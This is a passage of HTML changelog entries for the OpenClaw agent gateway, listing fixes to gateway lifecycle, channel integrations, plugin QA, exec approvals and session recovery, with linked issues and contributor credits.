<li>Gateway/shutdown: report structured shutdown warnings and HTTP close timeout warnings through <code>ShutdownResult</code> while preserving lifecycle hook hardening. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046867239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41296" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41296/hovercard" href="https://github.com/openclaw/openclaw/pull/41296">#41296</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edenfunf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edenfunf">@edenfunf</a>.</li>
<li>Control UI: keep Agents Overview and config-form select dropdowns on their configured value after options render while preserving inherited agent model placeholders. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042433661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40352" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40352/hovercard" href="https://github.com/openclaw/openclaw/issues/40352">#40352</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4121542753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52948" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/52948/hovercard" href="https://github.com/openclaw/openclaw/pull/52948">#52948</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaoquanidea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaoquanidea">@xiaoquanidea</a>.</li>
<li>Agents/exec: launch zsh, bash, and fish host exec shells with startup files suppressed while preserving existing PATH fallbacks, so daemon env is not overridden by shell startup files. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042016257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40200" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40200/hovercard" href="https://github.com/openclaw/openclaw/pull/40200">#40200</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041976066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40179" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40179/hovercard" href="https://github.com/openclaw/openclaw/issues/40179">#40179</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NewdlDewdl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NewdlDewdl">@NewdlDewdl</a>.</li>
<li>Plugins/QA: prebuild the private QA channel runtime before plugin gauntlet source runs so wrapper CPU/RSS measurements are not polluted by private QA dist rebuild work. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QA: add a Kitchen Sink plugin gauntlet that installs the external package, checks command inventory, MCP tools, channel status, provider turns, gateway RSS, CPU, and fatal log anomalies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/config: reuse the bundled plugin alias scan within a single config normalization pass, so Kitchen Sink-style plugin configs no longer peg Gateway CPU by repeatedly rescanning bundled metadata before agent turns. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: reject malformed runtime channel registrations that omit required config helpers before they can poison channel status. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/plugins: serialize raw plugin tool return values through the plugin-tools MCP bridge so Kitchen Sink-style tools no longer surface <code>undefined</code> content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/reload: bound default restart deferral and SIGUSR1 restart drain to five minutes while preserving explicit <code>deferralTimeoutMs: 0</code> indefinite waits, so stale active work accounting cannot block config reloads forever. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: register the prompt-build hook with the configured recall timeout plus setup grace instead of the 150s maximum budget, so default memory recall cannot delay turn startup for multiple minutes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/readiness: include an <code>eventLoop</code> diagnostic block in local or authenticated <code>/readyz</code> responses with event-loop delay (p99 and max), event-loop utilization, CPU core ratio, and a <code>degraded</code> flag, so operators can see when slow startups or runaway turns stall the event loop. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/agents: schedule accepted agent runs after the accepted RPC frame has a chance to flush, so pre-turn prompt/context work is less likely to starve immediate <code>agent.wait</code> callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/update: tolerate stale memory-runtime import failures during best-effort CLI process teardown, so <code>openclaw update</code> replacing hashed runtime chunks before the finalizer runs no longer surfaces as exit-time <code>Cannot find module</code> noise. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/channels logs: reuse the rolling log-file resolver so <code>openclaw channels logs</code> falls back to the active dated log across date boundaries without reading unrelated custom log files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056125824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42875" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42875/hovercard" href="https://github.com/openclaw/openclaw/issues/42875">#42875</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056258292" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42904/hovercard" href="https://github.com/openclaw/openclaw/pull/42904">#42904</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057041029" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43043/hovercard" href="https://github.com/openclaw/openclaw/pull/43043">#43043</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethanclaw">@ethanclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wdskuki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wdskuki">@wdskuki</a>.</li>
<li>CLI/update: skip tracked plugins disabled in config during post-update plugin sync before npm, ClawHub, or marketplace update checks, preserving their install records without failing the update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347036954" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73880/hovercard" href="https://github.com/openclaw/openclaw/issues/73880">#73880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/islandpreneur007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/islandpreneur007">@islandpreneur007</a>.</li>
<li>Control UI: fix Peak Error Hours showing incorrect hourly rates when the browser's timezone observes DST, by storing hourly message counts with UTC date keys and using DST-aware <code>Date.getHours()</code> for local conversion. Also extract <code>accumulateMessageCounts</code> helper to reduce duplicated daily/hourly aggregation logic. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4092402816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49396" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49396/hovercard" href="https://github.com/openclaw/openclaw/pull/49396">#49396</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</li>
<li>iMessage: normalize known leading attributedBody corruption markers on sent-message echo text keys so delayed reflected echoes with U+FFFD/U+FFFE/U+FFFF/FEFF prefixes are dropped without collapsing interior text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197665190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59973/hovercard" href="https://github.com/openclaw/openclaw/issues/59973">#59973</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197722194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59980" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59980/hovercard" href="https://github.com/openclaw/openclaw/pull/59980">#59980</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214583433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62191" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62191/hovercard" href="https://github.com/openclaw/openclaw/pull/62191">#62191</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maguilar631697/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maguilar631697">@maguilar631697</a>.</li>
<li>Security/audit: recognize dangerous node command IDs as valid <code>gateway.nodes.denyCommands</code> entries, so audit only warns on real typos or unsupported patterns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163604946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56923" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56923/hovercard" href="https://github.com/openclaw/openclaw/pull/56923">#56923</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chziyue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chziyue">@chziyue</a>.</li>
<li>Cron: treat implicit text payloads with agent-turn overrides as agent turns, preserving model overrides for scheduled text prompts instead of pruning them as system events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001694353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/28905" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/28905/hovercard" href="https://github.com/openclaw/openclaw/issues/28905">#28905</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236386081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64060" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64060/hovercard" href="https://github.com/openclaw/openclaw/pull/64060">#64060</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liaoandi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liaoandi">@liaoandi</a>.</li>
<li>Telegram/exec approvals: stop treating general Telegram chat allowlists and <code>defaultTo</code> routes as native exec approvers; Telegram now uses explicit <code>execApprovals.approvers</code> or owner identity from <code>commands.ownerAllowFrom</code>, matching the first-pairing owner bootstrap path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/providers: keep Gateway startup primary-model discovery on metadata-only provider entries and reuse active non-speech capability providers even with explicit plugin entries, avoiding unnecessary provider registry loads during startup and media capability checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345357678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73729" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73729/hovercard" href="https://github.com/openclaw/openclaw/issues/73729">#73729</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346570757" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73835/hovercard" href="https://github.com/openclaw/openclaw/issues/73835">#73835</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346027613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73793/hovercard" href="https://github.com/openclaw/openclaw/issues/73793">#73793</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346797079" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73853" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73853/hovercard" href="https://github.com/openclaw/openclaw/pull/73853">#73853</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346030125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73794/hovercard" href="https://github.com/openclaw/openclaw/pull/73794">#73794</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/poolside-ventures/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/poolside-ventures">@poolside-ventures</a>.</li>
<li>Chat commands: route sensitive group <code>/diagnostics</code> and <code>/export-trajectory</code> approvals and results to a private owner route, preferring same-surface DMs before falling back to the first configured owner route, so Discord group invocations can land in Telegram when that is the primary owner interface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/hooks: keep successful <code>deliver:false</code> agent hooks silent, log a hook audit record for suppressed success announcements, and suppress fallback summaries after attempted hook delivery while still surfacing failed hook runs. Repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4151948578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55761" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55761/hovercard" href="https://github.com/openclaw/openclaw/pull/55761">#55761</a>; builds on <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4028886435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/36332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/36332/hovercard" href="https://github.com/openclaw/openclaw/pull/36332">#36332</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091099015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49234" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49234/hovercard" href="https://github.com/openclaw/openclaw/pull/49234">#49234</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EffortlessSteven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EffortlessSteven">@EffortlessSteven</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cioclawcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cioclawcode">@cioclawcode</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BrennerSpear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BrennerSpear">@BrennerSpear</a>.</li>
<li>Plugin SDK/Discord: restore a deprecated <code>openclaw/plugin-sdk/discord</code> compatibility facade and the legacy compat group-policy warning export for the published <code>@openclaw/discord@2026.3.13</code> package, covering its config, account, directory, status, and thread-binding imports while keeping new plugins on generic SDK subpaths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344804450" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73685/hovercard" href="https://github.com/openclaw/openclaw/issues/73685">#73685</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345028871" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73703/hovercard" href="https://github.com/openclaw/openclaw/pull/73703">#73703</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rderickson9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rderickson9">@rderickson9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Channels/Discord: suppress duplicate gateway monitors when multiple enabled accounts resolve to the same bot token, preferring config tokens over default env fallback and reporting skipped duplicates as disabled. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344054955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73608" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73608/hovercard" href="https://github.com/openclaw/openclaw/pull/73608">#73608</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>CLI/health: build channel health summaries from inspected credential metadata plus runtime state, so <code>openclaw health --json</code> reports Discord <code>running</code>, <code>connected</code>, and <code>tokenSource</code> consistently with channel status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066903951" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44354" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44354/hovercard" href="https://github.com/openclaw/openclaw/issues/44354">#44354</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ferenc-acs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ferenc-acs">@ferenc-acs</a>.</li>
<li>Control UI/Talk: decode Google Live binary WebSocket JSON frames and stop queued browser audio on interruption or shutdown, so browser Talk leaves <code>Connecting Talk...</code> and barge-in no longer plays stale audio. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343876260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73601/hovercard" href="https://github.com/openclaw/openclaw/issues/73601">#73601</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342101919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73460/hovercard" href="https://github.com/openclaw/openclaw/issues/73460">#73460</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342138204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73466/hovercard" href="https://github.com/openclaw/openclaw/pull/73466">#73466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>.</li>
<li>Channels/Discord: ignore stale route-shaped conversation bindings after a Discord channel is reconfigured to another agent, while preserving explicit focus and subagent bindings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344233247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73626/hovercard" href="https://github.com/openclaw/openclaw/issues/73626">#73626</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ramitrkar-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ramitrkar-hash">@ramitrkar-hash</a>.</li>
<li>Agents/bootstrap: pass pending BOOTSTRAP.md contents through the first-run user prompt while keeping them out of privileged system context, and show limited bootstrap guidance when workspace file access is unavailable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344203540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73622/hovercard" href="https://github.com/openclaw/openclaw/issues/73622">#73622</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mark1010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mark1010">@mark1010</a>.</li>
<li>ACP/tasks: classify parent-owned ACP sessions as background work regardless of persistent runtime mode, and close terminal stale ACP sessions when no active binding remains, so delegated ACP output reports through the parent task notifier instead of acting like a normal foreground chat session. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Tasks: keep terminal mirrored TaskFlow timestamps pinned to task completion time and let maintenance repair stale mirrors, so ACP terminal delivery updates no longer leave inconsistent flow audits. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Gateway/sessions: add conservative stuck-session recovery that releases only stale session lanes while active embedded runs, reply operations, and lane tasks remain serialized, so queued follow-ups can drain without aborting legitimate long-running turns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343463353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73581/hovercard" href="https://github.com/openclaw/openclaw/issues/73581">#73581</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344463460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73655/hovercard" href="https://github.com/openclaw/openclaw/issues/73655">#73655</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345057984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73705/hovercard" href="https://github.com/openclaw/openclaw/issues/73705">#73705</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343876260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73601/hovercard" href="https://github.com/openclaw/openclaw/issues/73601">#73601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WS-Q0758/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WS-Q0758">@WS-Q0758</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bryangauvin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bryangauvin">@bryangauvin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spenceryang1996-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spenceryang1996-dot">@spenceryang1996-dot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bmilne1981/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bmilne1981">@bmilne1981</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattmcintyre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattmcintyre">@mattmcintyre</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a>.</li>
<li>Plugins: cache unchanged plugin manifest loads by file signature, reducing repeated JSON/JSON5 parsing and manifest normalization in bursty startup and runtime registry paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344765997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73678/hovercard" href="https://github.com/openclaw/openclaw/pull/73678">#73678</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TheDutchRuler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TheDutchRuler">@TheDutchRuler</a>.</li>
